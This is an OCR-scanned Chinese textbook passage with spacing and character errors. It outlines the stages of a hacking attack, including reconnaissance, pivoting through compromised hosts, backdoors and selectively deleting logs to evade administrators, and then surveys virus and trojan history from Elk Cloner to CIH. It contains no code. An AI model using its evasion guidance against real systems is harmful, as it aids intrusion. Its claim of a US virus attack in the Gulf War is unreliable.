黑客 攻击 的 一 般 过 程 分 为 三 个 阶段 。 第 一 个 阶段 是 攻击 准备 阶段 ,具体 包括 确定 攻 
击 目的 信息 收集 准备 攻击 工具 ;第 二 个 阶段 是 攻击 实施 阶段 ,具体 包括 隐藏 自己 的 位 
置 利用 各 种 手段 登录 目标 主机 、 利 用 漏洞 与 后 门 获得 控制 权限 ;第 三 阶段 是 攻击 善后 工 
作 , 包 括 消除 痕迹 、 植 入 后 门 、 退 出。 


1. 确定 攻击 目的 与 目标 


网 络 攻击 和 处 理 一 件 事情 一 样 ,首先 要 确定 做 这 件 事 的 目的 。 只 有 明确 了 目的 , 才 
能 采取 行 之 有 效 的 手段 。 出 于 种 种 原因 黑客 企图 展开 攻击 ,也 许 是 为 了 利益 ,也 许 是 练 
习 , 也 许 是 报复 ,但 最 后 都 是 为 了 主机 的 控制 权 。 对 于 攻击 目标 ,黑客 首先 要 通过 一 些 手 
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段 来 获取 他 所 要 攻击 的 主机 IP 地 址 ,而 对 于 网 络 攻击 目的 ,常见 的 可 以 分 为 破坏 型 或 人 
侵 型 ,基本 包含 如 下 几 点 , 即 窃取 信息 、 获 取 口 令 ,控制 中 间 站 点 .获得 超级 用 户 权限 等 。 


2. 攻击 前 信息 收集 


要 攻击 一 台 主 机 ,首先 要 确定 它 上 面 正在 运行 的 操作 系统 是 什么 ,因为 对 于 不 同类 
型 的 操作 系统 ,其 系统 上 的 漏洞 有 很 大 区 别 , 所 以 攻击 的 方法 也 完全 不 同 , 甚 至 同一 种 操 
作 系 统 的 不 同 版 本 的 系统 漏洞 也 是 不 一 样 的 。 在 收集 到 一 些 准 备 要 攻击 目标 的 信息 后 ， 
黑客 们 会 探测 目标 网 络 上 的 每 台 主 机 ,来 寻求 系统 内 部 的 安全 漏洞 。 信 息 收 集 有 时 候 也 
被 称 为 “踩点 ”。 一 般 收 集 信息 有 两 种 手段 。 第 一 种 是 从 社会 工程 学 的 角度 。 首 先 , 黑 客 
可 以 通过 一 些 公开 的 信息 ,如 网 页 上 公司 人 员 和 名单 .办 公 室 电话 、 管 理 员 的 个 人 信息 等 。 
其 次 ,也 可 以 通过 各 种 途径 获得 管理 员 以 及 内 部 人 员 的 信任 ,如 网 络 聊天 , 待 时 机 成 熟 发 
送 加 壳 木 马 或 者 键盘 记录 工具 等 。 最 后 ,黑客 甚至 可 以 以 帮助 其 测试 软件 或 其 他 名 义 ， 
直接 进入 网 络 机 房 进 行人 侵 。 第 二 种 手段 是 运用 技术 手段 。 如 一 些 公 开 的 信息 服务 、 
Google 等 搜索 引擎 往往 能 够 提供 大 量 相关 信息 ,甚至 有 时 候 能 够 直接 获取 目标 机 器 的 脆 
弱点 或 数据 库 文件 。 利 用 SNMP 协议 ,来 查阅 网 络 系统 路 由 器 的 路 由 表 , 从 而 了 解 目标 
主机 所 在 网 络 的 拓扑 结构 及 其 内 部 细节 。 利 用 TraceRonute 程序 能 够 获得 到 达 目 标 主机 
所 要 经 过 的 网 络 数 和 路 由 器 数 ; 利 用 Whois 协议 能 提供 所 有 有 关 的 DNS 域 和 相关 的 管 
理 参数 ;利用 DNS 服务 器 可 以 查询 能 够 访问 的 主机 IP 地 址 表 和 它们 所 对 应 的 主机 名 ; 
利用 Finger 协议 可 以 用 来 获取 一 个 指定 主机 上 的 所 有 用 户 的 详细 信息 。 利 用 Ping 实用 
程序 可 以 确定 一 个 指定 的 主机 位 置 ;利用 自动 Wardialing 软件 可 以 向 目标 站 点 一 次 连续 
播 出 大 批 电话 号 码 。 


3. 隐藏 自己 的 位 置 


隐藏 位 置 就 是 隐藏 黑客 的 IP 地 址 。 通 常 有 两 种 办 法 隐藏 自己 的 IP 地 址 。 第 一 种 办 
法 是 先入 侵 一 台电 脑 ,这 台电 脑 俗 称 * 肉 鸡 ”, 利 用 这 台电 脑 进行 攻击 。 因 为 这 样 即使 被 
发 现 了 也 是 “肉鸡 ”的 IP 地 址 ,而 不 是 黑客 真正 的 IP 地 址 。 第 二 种 办 法 是 做 多 级 跳板 
“Sock 代理 ”, 这 样 在 人 侵 的 电脑 上 留 下 的 是 代理 计算 机 的 IP 地址 。 


4. 利用 扫描 工具 进行 扫描 


扫描 是 一 种 发 现 可 利用 通信 信道 的 方法 。 其 基本 思想 为 探测 尽 可 能 多 的 接听 者 ,并 
通过 对 方 的 反馈 找到 符合 要 求 的 对 象 。 扫 描 在 其 中 两 个 黑客 攻击 步骤 会 用 到 : 一 个 是 攻 
击 准备 阶段 的 信息 收集 时 ,对 系统 进行 信息 扫描 ,包括 IP 扫描 和 端口 扫描 ; 另 一 个 是 攻 
击 实施 阶段 ,对 系统 漏洞 扫描 。 当 我 们 通过 信息 扫描 ,知道 基本 的 IP 网 段 、 服 务 器 系统 
等 信息 后 ,可 以 有 针对 性 地 对 目标 进行 扫描 。 一 般 来 说 ,具有 漏洞 的 应 用 程序 在 对 某 些 
特别 的 网 络 请 求 作 应 答 时 ,会 与 已 经 安装 补丁 的 应 用 程序 有 所 差别 。 漏 洞 扫描 程序 利用 
的 就 是 这 种 差别 来 识别 目标 主机 上 的 应 用 程序 是 否 有 漏洞 。 常 见 的 工具 如 Xscan、 流 光 、 
Shadow Security Scanner Internet Security Scanner, Secure Analysis Tool for Auditing 
Network 等 。 这 些 工具 都 具有 两 面 性 ,系统 管理 员 可 以 利用 这 些 工具 来 帮助 其 管理 网 络 
系统 内 部 的 安全 隐患 ,从 而 确定 系统 哪些 主机 需要 打 补 丁 。 但 黑客 们 也 可 以 利用 这 些 工 
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具 来 收集 目标 主机 的 信息 ,获取 目标 主机 的 非法 访问 权 。 
5. 实施 攻击 


若是 破坏 型 的 攻击 ,黑客 一 般 情况 下 会 使 用 各 种 工具 与 方法 , 令 目 标 主机 停止 服务 。 
若是 入 侵 型 的 攻击 ,黑客 往往 需要 利用 收集 到 的 信息 ,找到 其 系统 漏洞 ,然后 利用 漏洞 获 
取 一 定 的 权限 。 但 大 部 分 情况 下 ,获取 最 高 权限 才 被 视 为 是 一 次 完整 的 攻击 。 之 后 黑客 
会 试图 毁 掉 攻击 人 侵 的 痕迹 ,并 在 受到 损害 的 系统 上 建立 新 的 安全 漏洞 或 后 门 , 以 便 在 
先前 的 攻击 点 被 发 现 之 后 能 够 继续 访问 这 个 系统 。 并 且 有 可 能 在 系统 中 安装 探测 软件 
甚至 是 木马 ,用 来 掌握 用 户 的 一 切 活 动 , 以 收集 黑客 感 兴趣 的 东西 。 


6. 巩固 系统 控制 


系统 漏洞 分 为 两 种 , 即 远程 漏洞 与 本 地 漏洞 。 远 程 漏洞 是 指 黑客 可 以 在 别 的 机 器 上 
直接 利用 该 漏洞 进行 攻击 并 获取 一 定 的 权限 。 这 种 漏洞 的 威胁 性 相当 大 ,黑客 的 攻击 一 
般 都 是 从 远程 漏洞 开始 ,接着 黑客 会 配合 本 地 漏洞 来 把 获得 的 权限 进行 扩大 。 当 获取 控 
制 权 后 ,黑客 为 了 长 时 间 保 留 和 巩固 对 系统 的 控制 ,会 清除 入 侵 记 录 。 日 志 是 黑客 的 犯 
罪 记录 ,厉害 的 黑客 往往 只 会 删除 与 自己 相关 的 日 志 , 因 为 若是 直接 删除 全 部 日 志 往往 
会 引起 管理 员 的 注意 。 


7. 继续 深入 


黑客 和 人 侵 成 功 后 ,为 了 方便 下 次 进入 ,都 会 安装 一 个 不 易 被 发 现 的 后 门 程序 ,或 者 植 
入 新 的 漏洞 ,以 便于 下 次 进入 。 而 且 黑 客 一 旦 入 侵 目 标 主机 成 功 后 ,一般 都 会 修复 漏洞 。 
因为 别 的 黑客 也 有 可 能 利用 该 漏洞 入 侵 该 系统 。 也 有 可 能 一 个 黑客 入侵 后 发 现 了 别 的 
黑客 留 的 后 门 或 漏洞 ,这 个 黑客 可 以 修复 或 者 挂 马 ,让 上 一 个 黑客 再 次 访问 该 系统 时 成 
为 受害 者 。 

8. 清除 痕迹 

当 入 侵 完 成 后 ,黑客 会 清理 人 侵 痕 迹 。 需 要 清理 的 包括 应 用 程序 日 志 、 安 全 日 志 、 系 
统 日 志 等 。 其 中 应 用 程序 日 志 应 当 包括 由 应 用 程序 或 系统 程序 记录 的 事件 。 系 统 日 志 


应 当 包 括 Windows 系统 组 件 记 录 的 事件 。 安 全 日 志 应 当 包括 可 以 记录 的 安全 事件 , 例 
如 ,有 效 的 和 无 效 的 登录 尝试 ,创建 .打开 或 删除 文件 等 资源 使 用 相关 联 的 事件 。 


18 二 十 年 来 发 生 的 网 络 安 全 大 事件 及 其 技术 因素 


181 安全 威胁 迅速 萌芽 阶段 (1994 一 1999 年 ) 


纵 观 计算 机 历史 ,现今 肆虐 的 电脑 病毒 的 锥 形 只 是 起 源 于 一 个 游戏 。20 世纪 60 年 
代 初 ,美国 贝尔 实验 室 里 ,三 个 年 轻 的 程序 员 编写 了 一 个 名 为 “ 磁 世 大战? 的 游戏 ,游戏 中 
通过 复制 自身 来 摆脱 对 方 的 控制 ,这 就 是 所 谓 “ 病 毒 "的 第 一 个 锥 形 , 为 电脑 病毒 的 出 现 
黄 定 了 理论 基础 。 但 真正 第 一 次 提出 计算 机 病毒 这 个 概念 的 是 在 20 世纪 70 年 代 , 美 国 
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作家 雷 恩 在 其 出 版 的 (Pl 的 青春 ) 一 书 中 构思 了 一 种 能 够 自我 复制 且 利 用 通信 传播 的 计 
算 机 程序 ,并 第 一 次 称 之 为 “计算 机 病毒 *。 这 也 是 人 类 关于 计算 机 病毒 最 初 的 设想 。 
1982 年 ,elk cloner 病毒 出 现在 苹果 电脑 中 ,这 个 由 Rich Skrenta 编写 的 恶作剧 程序 ,是 
世界 上 已 知 的 第 一 个 电脑 病毒 。 当 elk cloner 发 作 时 ,电脑 屏幕 上 会 现 出 一 段 英 文 : it 
will get on all your disks. ( 它 会 占领 你 所 有 的 磁盘 ) it will infiltrate your chips. (潜入 你 
的 芯片 ) yes it’s cloner! (是 的 , 它 就 是 克隆 病毒 !) it will stick to you like glue. ( 它 会 像 
胶水 一 样 黏 着 你 ) it will modify ram too. (也 会 修改 你 的 内 存 ) send in the cloner! (传播 
这 个 克隆 病毒 !) 但 当时 电脑 病毒 并 没有 被 明确 的 定义 ,这 个 病毒 也 仅仅 是 朋友 间 的 恶 作 
剧 。 而 计算 机 学 术 界 真正 认识 到 病毒 的 存在 是 在 1984 年 。1983 年 11 月 3 日 , 弗 雷 德 。 
科恩 在 UNIX 系统 下 ,编写 了 一 个 会 自动 复制 并 在 电脑 间 进 行 传染 从 而 引起 系统 死机 的 
小 程序 。 该 程序 对 电脑 并 无 害处 ,潜伏 于 更 大 的 合法 程序 当中 ,通过 软盘 传 到 电脑 上 。 
一 些 电脑 专家 也 曾 警 告 ,电脑 病毒 是 有 可 能 存在 的 ,但 科恩 是 第 一 个 真正 通过 实践 记录 
电脑 病毒 的 人 。1984 年 , 弗 雷 德 。 科恩 发 表 了 名 为 “电脑 病毒 一 一 理论 与 实验 ”的 文章 ， 
对 电脑 病毒 做 出 了 明确 定义 ,直到 此 时 ,电脑 病毒 才 被 正式 定义 , 弗 雷 德 .科恩 也 被 人 们 
称 为 “计算 机 病毒 之 父 ”。20 世纪 80 年 代 后 期 ,巴基斯坦 有 两 个 以 编 软 件 为 生 的 兄弟 ,他 
们 为 了 打击 那些 盗版 软件 的 使 用 者 ,设计 出 了 一 个 名 为 “巴基斯坦 智 吉 ”的 病毒 ,该 病毒 
只 传染 软盘 引导 。 这 就 是 最 早 在 世界 上 流行 的 一 个 真正 的 病毒 。 

计算 机 发 展 的 早期 出 现 的 电脑 病毒 多 数 为 引导 型 病毒 。 引 导 型 病毒 指 寄 生 在 磁盘 
引导 区 或 主 引导 区 的 计算 机 病毒 。 在 1986 年 ,中 国 发 现 了 第 一 例 电 脑病 毒 “小 球 ” 
病毒 。 其 发 作 条 件 是 当 系统 时 钟 处 于 半点 或 整 点 ,而 系统 又 在 进行 读 盘 操作 。 发 作 时 屏 
幕 出 现 一 个 活 蹦 乱 跳 的 小 圆 点 , 作 和 斜 线 运动 , 当 碰 到 屏幕 边沿 或 者 文字 就 立刻 反弹 , 碰 到 
的 文字 ,英文 会 被 整个 前 去 ,中 文 会 前 去 半 个 或 整个 前 去 ,也 可 能 留 下 制 表 符 乱 码 。 其 规 
律 是 : ASCII 码 字 符 后 3 位 为 3(011) 的 ,发 生 行 反射 ;后 3 位 为 5(101) 的 ,发 生 列 反射 ， 
其 他 字符 不 改变 小 球 运动 方向 。 小 球 病毒 后 期 经 过 一 些 好 事 者 的 改造 ,后 期 的 变种 运动 
规律 开始 逐渐 复杂 化 。Azusa/Hong-Kong/2078、“ 火 炬 /Torch”、“ 磁 盘 杀 手 /Disk 
Killer”、“Michelangelo/ 米 氏 病 毒 / 米 开朗 基 罗 ”等 ,它们 都 是 引导 型 病毒 ,利用 系统 引导 
时 ,不 对 主 引 导 区 的 内 容 正 确 与 否 进行 判别 的 缺点 ,在 引导 型 系统 的 过 程 中 侵入 系统 、 驻 
留 内 存 、 监 视 系 统 运 行 、 待 机 传染 和 破坏 。1988 年 至 1989 年 ,我 国 出 现 了 能 感染 硬盘 和 
软盘 引导 区 的 “石头 病毒,“ 石头 /大 麻 / 新 西 兰 /Stoned” 病 毒 ,该 病毒 感染 软 硬 盘 0 面 0 
道 1 扇 区 ,并 修改 部 分 中 断 向 量 表 。 该 病毒 不 隐藏 也 不 加 密 自 身 代 码 , 所 以 很 容易 被 查 
出 和 解除 。 该 病毒 体 代 码 中 有 明显 的 标志 : Your PC is now Stoned! LEGALISE 
MARIJUANA! 其 中 , Azusa/Hong-Kong/2078、“Michelangelo/ 米 氏 病 毒 / 米 开朗 基 
罗 ”“ 小 球 ” 等 病毒 是 来 自 于 国外 ,火炬 /Torch”“ 磁 盘 杀 手 /Disk Killer” 等 病毒 出 自 国 
人 之 手 , 但 实际 上 大 部 分 都 是 “石头 /大 麻 /新 西 兰 /Stoned” 病 毒 的 翻版 。 

1986 年 ,世界 上 出 现 了 第 一 个 计算 机 木马 一 一 PC-Write 木马 。 它 伪装 成 共享 软件 
PC-Write 的 2.72 版 本 ,但 事实 上 ,编写 PC-Write 的 Quicksoft 公司 从 未 发 行 过 2. 72 版 
本 ,一旦 用 户 信以为真 运行 该 木马 程序 ,硬盘 就 会 被 格式 化 。 当 然 , 此 时 的 第 一 代 木 马 还 
不 具备 传播 特征 。 
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从 1989 年 开始 ,出 现 了 一 种 可 以 感染 文件 的 病毒 ,主要 代表 有 “Jerusalem/ 黑 色 13 
号 星期 五 ”、Yankee Doole、Liberty、1575、Traveller、1465、2062,4096 等 。 此 类 病毒 主要 
感染 .COM 和 . EXE 文件 。 这 类 病毒 修改 了 部 分 中 断 向 量 表 , 即 利用 了 DOS 系统 加 载 执 
行文 件 的 机 制 从 而 在 系统 执行 文件 时 修改 中 断 , 并 在 系统 自动 调用 时 进行 传染 ,将 自身 
附加 于 可 执行 文件 中 ,被 感染 的 文件 明显 地 增加 了 字 节 数 ,并 且 病毒 代码 主体 没有 加 密 ， 
也 容易 被 查 出 和 解除 。 在 这 些 病 毒 中 , 略 有 对 抗 反 病 毒手 段 的 只 有 Yankee Doole 病毒 ， 
当 它 发 现 你 用 DEBUG 工具 跟踪 它 时 , 它 会 自动 从 文件 中 逃走 。 

在 随后 一 段 时 间 , 又 一 些 能 对 自身 进行 简单 加 密 的 病毒 相继 出 现 , 有 1366/DaLian、 
1824/N64、1741/Dong、1100 等 病毒 。 它 们 加 密 的 目的 主要 是 防止 跟踪 或 掩盖 有 关 特 征 
等 。 在 内 存 有 1741/Dong 病毒 时 ,用 DIR 列 目录 表 , 病 毒 会 掩盖 被 感染 文件 所 增加 的 字 
节 数 ,使 其 看 起 来 字 节 数 很 正常 。 

同样 是 在 1989 年 ,AIDS 木马 出 现在 人 们 视野 中 。 由 于 当时 很 少 有 人 使 用 电子 邮 
件 , 所 以 AIDS 的 作者 就 利用 现实 生活 中 的 邮件 进行 散播 : 给 其 他 人 寄 去 一 封 封 含有 木 
马 程序 软盘 的 邮件 。 之 所 以 叫 这 个 名 称 , 是 因为 软盘 中 包含 有 AIDS 和 HIV 疾病 的 药 
品 、 价 格 .预防 措施 等 相关 信息 。 软 盘 中 的 木马 程序 在 运行 后 ,虽然 不 会 破坏 数据 ,但 是 
会 将 硬盘 加 密 锁 死 ,然后 提示 受 感染 用 户 花 钱 消 灾 。 可 以 说 第 二 代 木 马 已 具备 了 传播 
特征 。 

以 后 又 出 现 了 引导 区 文件 型 “双料 "病毒 ,这 类 病毒 既 感 染 磁盘 引导 区 、 又 感染 可 执 
行文 件 , 常 见 的 有 “Flip/Omicron/ 丰 倒 ”"“XqR/New century/ 新 世纪 ”“Invader/ 侵 入 
者 ”“Plastique/ 塑 料 炸 弹 ”“3584/ 郑 州 ( 狼 )”、“3072 (秋天 的 水 )”、ALFA/3072-2、 
“Ghost/One_Half/3544/ 幽 灵 ”“Natas/4744/ 幽 灵 王 ”、TPVO/3783 等 ,如 果 只 解除 了 文 
件 上 的 病毒 ,而 没 解除 硬盘 主 引导 区 的 病毒 ,系统 引导 时 又 将 病毒 调和 内存, 会 重新 感染 
文件 。 如 果 只 解除 了 主 引导 区 的 病毒 ,而 可 执行 文件 上 的 病毒 没 解除 ,一 旦 执行 带 毒 的 
文件 ,就 会 感染 硬盘 主 引 导 区 。“Flip/Omicron/ 颠 倒 "“XqR/New century/ 新 世纪 ”这 两 
种 病毒 都 设计 有 对 抗 反 病毒 技术 的 手段 “Flip/Omicron/ 颠 倒 ? 病 毒 对 其 自身 代码 进行 
了 随机 加 密 , 变 化 无 穷 , 使 绝 大 部 分 病毒 代码 与 前 一 个 被 感染 目标 中 的 病毒 代码 几乎 没 
有 三 个 连续 的 字 节 是 相同 的 ,该 病毒 在 主 引导 区 只 潜藏 了 少量 的 代码 ,病毒 另 将 自身 的 
全 部 代码 潜藏 于 硬盘 最 后 6 个 鹿 区 中 ,并 将 硬盘 分 区 表 和 DOS 引导 区 中 的 磁盘 实用 局 
区 数 减少 了 6 个 扇 区 ,所 以 再 次 启动 系统 后 ,硬盘 的 实用 空间 就 减少 了 6 个 肩 区 。 这 样 ， 
原 主 引 导 记 录 和 病毒 主 程序 就 保存 在 硬盘 实用 扇 区 外 ,避免 了 其 他 程序 的 覆盖 ,而且 用 
DEBUG 的 工 命令 也 不 能 调 出 查看 ,就 是 用 FORMAT 进行 格式 化 也 不 能 消除 病毒 ,与 此 
相似 的 还 有 Denzuko 病毒 。“XqR/New century/ 新 世纪 ?病毒 也 有 它 更 狭 独 的 一 面 , 它 
监视 着 INT13 INT21 中 断 的 有 关 参 数 , 当 你 要 查看 或 搜索 被 其 感染 了 的 主 引 导 记 录 时 ， 
病毒 就 调换 出 正常 的 主 引导 记录 给 你 查看 或 让 你 搜索 ,使 你 认为 一 切 正常 ,病毒 却 蒙 混 
过 关 。 我 们 在 此 称 为 : 病毒 在 内 存 时 ,具有 “反串 ”( 反 转 ) 功 能 。 这 类 病毒 还 有 “Mask/ 假 
面具 ”“2709/ROSE/ 玫 瑰 ”“Ghost/One_Half/3544/ 幽 灵 ”、“Natas/4744/ 幽 灵 王 ”、 
Monkey、PC_LOCK .DIE_HARD/HD2、GranmaGrave/Burglar/1150、3783 病毒 等 ,现在 
的 新 病毒 越 来 越 多 地 使 用 这 种 功能 来 对 抗 安装 在 硬盘 上 的 抗 病毒 软件 ,但 用 无 病毒 系统 
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软盘 引导 机 器 后 ,病毒 就 失去 了 “反串 ”( 反 转 ) 功 能 。1992 年 后 ,病毒 以 一 种 全 新 的 面貌 
出 现 ,具有 感染 力 极 强 ,无 任何 表现 ,不 修改 中 断 向 量 表 , 而 直接 修改 系统 关键 中 断 的 内 
核 ,修改 可 执行 文件 的 首 簇 数 ,将 文件 名 字 与 文件 代码 主体 分 离 。 在 系统 有 此 病毒 的 情 
况 下 ,一 切 就 像 没 发 生 一 样 。 而 在 系统 无 病毒 时 ,你 用 无 病毒 的 文件 去 覆盖 有 病毒 的 文 
件 ,灾难 就 会 发 生 ,全盘 所 有 被 感染 的 可 执行 文件 内 容 都 是 刚 覆 盖 进 去 的 文件 内 容 , 这 是 
病毒 “我 死 你 也 活 不 成 ”的 罪恶 伎俩 。 该 病毒 的 出 现 , 使 病毒 又 多 了 一 种 新 类 型 。 

值得 一 提 的 是 ,在 1991 年 的 “海湾 战争 "中 ,美军 第 一 次 将 电脑 病毒 用 于 实战 ,在 空 
袭 巴 格 达 的 战斗 中 ,成 功 地 破坏 了 对 方 的 指挥 系统 ,使 之 瘫痪 ,保证 了 战斗 的 顺利 进行 ， 
直至 最 后 胜利 。 

1994 年 ,中 国正 式 接 入 互联 网 ,由 此 拉 开 了 互联 网 安全 的 序幕 。 当 时 ,国内 的 网 络 技 
术 资 料 相当 匮乏 ,人 才 稀 缺 。 但 有 一 个 人 不 得 不 提 到 ,他 在 中 国 黑客 史 中 占 据 了 非常 重 
要 的 位 置 , 此 人 就 是 来 自 中 国 台湾 的 coolfire。 中 国 最 早 一 批 黑 客 ,基本 上 都 是 从 阅读 此 
人 写 的 教程 中 走 人 网 络 攻防 世界 的 。 

1995 年 ,出 现 了 一 个 危险 的 信号 ,在 对 众多 的 病毒 剖析 中 ,发 现 部 分 病毒 好 像 出 于 一 
个 家 族 ,其 "遗传 基因 ”相同 ,是 “同族 ?病毒 ,但 绝 不 是 其 他 好 奇 者 简单 地 修改 部 分 代码 而 
产生 的 “ 改 形 "病毒 。 简 单 地 说 ,“ 改 形 ” 病 毒 与 “ 原 种 "病毒 的 代码 长 度 相差 不 大 , 绝 大 多 
数 病毒 代码 与 “ 原 种 ”的 代码 相同 ,并 且 相 同 的 代码 其 位 置 也 相同 ,否则 就 是 一 种 新 的 病 
毒 。 大 量具 有 相同 “遗传 基因 ”的 “同族 ”病毒 的 涌现 ,使 人 不 得 不 怀疑 “病毒 生产 机 ”软件 
已 出 现 。1996 年 下 半年 在 国内 终于 发 现 了 G2、IVP、VCL 三 种 “病毒 生产 机 软件 ”, 不 法 
之 徒 ,可 以 用 来 编 出 千 万 种 新 病毒 。 

1996 年 10 月 份 , 宏 病 毒 出 现在 了 公众 的 视野 里 。 最 早 的 宏 病 毒 ,是 针对 微软 公司 的 
文字 处 理 软 件 Word 编写 的 一 种 病毒 ,利用 的 是 Word 软件 中 提供 的 Word BASIC 编程 
接口 。 作 为 一 种 新 型 病毒 , 宏 病 毒 有 自身 特点 ,如 隐蔽 性 强 、 传 播 迅速 破坏 性 大 、 难 以 防 
治 .制作 和 变种 方便 、 多 平台 交叉 感染 等 。Word 宏 病 毒 通过 . DOC 文档 及 . DOT 模板 进 
行 自我 复制 和 传播 。 而 且 一 般 用 户 对 于 外 来 文档 文件 基本 都 是 直接 浏览 ,这 给 Word 宏 
病毒 传播 带 来 很 多 便利 。 特 别 是 互联 网 的 普及 使 得 宏 病 毒 的 传播 更 广 、 更 快 。 此 类 病毒 
有 “台湾 一 号 /TaiwanNo. 1”“Concept/ 概 念 ”、SetMd、Cap、“MdMa/ 无 政府 一 号 ”。 而 宏 
病毒 集中 爆发 的 1997 年 ,也 被 公认 为 计算 机 反 病 毒 界 的 “ 宏 病 毒 * 年 。 随 着 微软 其 他 产 
品 的 推出 , 宏 病 毒 种 类 变 得 多 种 多 样 。 包 括 Word 宏 病 毒 、Excel 宏 病 毒 、Access 宏 病 毒 、 
Ami Pro 宏 病 毒 、Word Perfect 宏 病 毒 等 。 根 据 国 外 较 保守 的 统计 , 宏 病 毒 的 感染 率 高 达 
40% 以 上 , 即 在 现实 生活 中 每 发 现 100 个 病毒 ,其 中 就 有 40 多 个 宏 病 毒 ,而 国际 上 普通 
病毒 种 类 已 达 12000 多 种 。 

1997 年 ,特洛伊 木马 这 个 名 词 早 已 在 国外 传 得 热火 朝天 , 随 着 互联 网 的 普及 ,木马 造 
成 的 影响 越 来 越 大 ,但 国内 只 有 少数 用 户 知道 。 那 时 知名 的 木马 有 Back Orifice/BO、 
Backdoor/SubSeven/Sub7 等 。Back Orifice/ BO 程序 虽然 短小 但 是 威力 强大 ,运行 时 难 
以 察觉 。 只 要 成 功 地 进行 了 欺骗 性 的 行为 .哪怕 只 有 一 次 ,该 程序 便 能 完成 自动 安装 , 永 
久 发 挥 作用 。 在 1999 年 7 月 , Back Orifice 2000/BO2K 被 公之于众 。 此 时 的 Back 
Orifice 2000/BO2K 已 经 成 为 一 个 公开 、 免 费 的 远程 控制 工具 。 但 它 就 像 是 一 把 利 剑 , 黑 
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客 可 以 用 它 控制 受害 者 的 电脑 ,而 网 络 管理 员 可 以 用 它 控 制 他 所 管理 的 主机 。 
Backdoor/SubSeven/Sub7 大 概 是 世界 上 最 著名 的 木马 ,也 是 最 优秀 的 远程 控制 软件 之 
一 ,许多 后 非 通 过 不 同 的 方式 向 它 致敬 。Backdoor/SubSeven/Sub7 是 一 个 基于 
Windows 9x 的 特洛伊 木马 , 当 该 木马 运行 的 时 候 , 它 能 够 通过 Internet 向 运行 相应 客户 
端 软件 的 黑客 提供 染 毒 机 器 的 所 有 访问 权限 。 它 可 以 远程 控制 其 他 计算 机 ,可 用 于 次 
号 、 盗 取信 用 卡 密码 等 违法 活动 。 

1998 年 6 月 2 日 , 首 例 CIH 病毒 v1.0 版 本 报告 从 台湾 传 出 。CIH 病毒 的 别名 有 
Win95. CIH 、Spacefiller、Win32. CIH 、PE_CIH ,是 继 DOS 病毒 .Windows 病毒 、 宏 病毒 
后 的 第 四 类 新 型 病毒 ,是 第 一 个 流行 的 攻击 PE 格式 32 位 保护 模式 程序 的 病毒 ,也 是 第 
一 个 攻击 和 破坏 硬件 的 计算 机 病毒 。 它 主要 感染 Windows 95/98 下 的 可 执行 文件 ,目前 
的 版 本 不 感染 DOS 以 及 Windows 3.X 下 的 可 执行 文件 ,并 且 在 Windows NT 中 无 效 。 
高 版 本 的 病毒 不 但 可 以 直接 利用 IOS 指令 摧毁 硬盘 数据 ,更 通过 清洗 存储 在 Flash 
EPROM 中 的 BIOS 指令 ,导致 系统 主板 无 法 工作 ,彻底 破坏 机 器 。CIH 病毒 其 发 展 过 程 
经 历 了 v1.0,v1l.1.v1.2.vl.3、v1.4 总 共 5 个 版 本 。 该 病毒 v1.0 仅仅 只 有 656 字 节 ,其 
锥 形 显得 比较 简单 ,与 普通 类 型 的 病毒 在 结构 上 并 无 多 大 的 改善 ,其 最 大 的 “卖点 ”是 在 
于 其 是 当时 为 数 不 多 的 .可 感染 Microsoft Windows PE 类 可 执行 文件 的 病毒 之 一 ,被 其 
感染 的 程序 文件 长 度 增加 ,此 版 本 的 CIH 不 具有 破坏 性 。 当 其 发 展 到 v1. 1 版 本 时 ,病毒 
长 度 为 796 字 节 ,此 版 本 的 CIH 病毒 具有 可 判断 Windows NT 软件 的 功能 ,一 旦 判断 用 
户 运行 的 是 Windows NT, 则 不 发 生 作 用 ,进行 自我 隐藏 ,以 避免 产生 错误 提示 信息 , 同 
时 使 用 了 更 加 优化 的 代码 ,以 缩减 其 长 度 。 此 版 本 的 CIH 另外 一 个 优秀 点 在 于 其 可 以 利 
用 Windows PE 类 可 执行 文件 中 的 “空隙 ”, 将 自身 根据 需要 分 裂 成 几 个 部 分 后 ,分 别 插 
入 到 PE 类 可 执行 文件 中 ,这 样 做 的 优点 是 在 感染 大 部 分 Windows PE 类 文件 时 ,不 会 导 
致 文件 长 度 增 加 。 当 其 发 展 到 v1. 2 版 本 时 ,除了 改正 了 一 些 vl. 1 版 本 的 缺陷 之 外 , 同 
时 增加 了 破坏 用 户 硬盘 以 及 用 户主 机 BIOS 程序 的 代码 ,这 一 改进 ,使 其 步 人 恶性 病毒 的 
行列 ,此 版 本 的 CIH 病毒 体 长 度 为 1003 字 节 。 原 先 v1. 2 版 本 的 CIH 病毒 最 大 的 缺陷 
在 于 当 其 感染 ZIP 自 解压 包 文件 时 ,将 导致 此 ZIP 压缩 包 在 自 解压 时 出 现 : WinZip Self- 
Extractor header corrupt. Possible cause: disk or file transfer error. 的 错误 警告 信息 。 
v1.3 版 本 的 CIH 病毒 显得 比较 仓促 ,其 改进 点 便 是 针对 以 上 缺陷 的 , 它 的 改进 方法 是 : 
一 旦 判断 开启 的 文件 是 WinZip 类 的 自 解压 程序 , 则 不 进行 感染 。 同 时 ,此 版 本 的 CIH 
病毒 修改 了 发 作 时 间 。v1. 3 版 本 的 CIH 病毒 长 度 为 1010 字 节 。v1.4 版 本 的 CIH 病毒 
改进 上 几 个 版 本 中 的 缺陷 ,不 感染 ZIP 自 解 压 包 文件 ,同时 修改 了 发 作 日 期 及 病毒 中 的 
版 权 信息 ,此 版 本 的 长 度 为 1019 字 节 。 从 上 面 的 说 明 中 ,我们 可 以 看 出 ,实际 上 ,在 CIH 
的 相关 版 本 中 ,只 有 vl.2、vl.3、vl.4 这 3 个 版 本 的 病毒 具有 实际 的 破坏 性 ,其 中 v1.2 版 
本 的 CIH 病毒 发 作 日 期 为 每 年 的 4 月 26 日 ,这 也 就 是 2002 年 最 流行 的 病毒 版 本 ,v1. 3 
版 本 的 发 作 日 期 为 每 年 的 6 月 26 日 ,而 CIH v1.4 版 本 的 发 作 日 期 则 被 修改 为 每 月 的 26 
日 ,这 一 改变 大 大 缩短 了 发 作 期 限 ,增加 了 破坏 性 。CIH 病毒 的 5 个 版 本 中 ,造成 危害 最 
广泛 与 深远 的 是 v1. 2 版 本 。1998 年 首次 大 范围 爆发 ,导致 全 球 超 过 六 千 万 台电 脑 遭 到 
不 同 程度 的 破坏 。2000 年 第 二 次 大 范围 爆发 导致 全 球 损失 超过 十 亿美 元 。2001 年 第 三 
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次 大 范围 爆发 , 仅 北京 就 有 超过 六 千 台 电脑 遭 破坏 。 

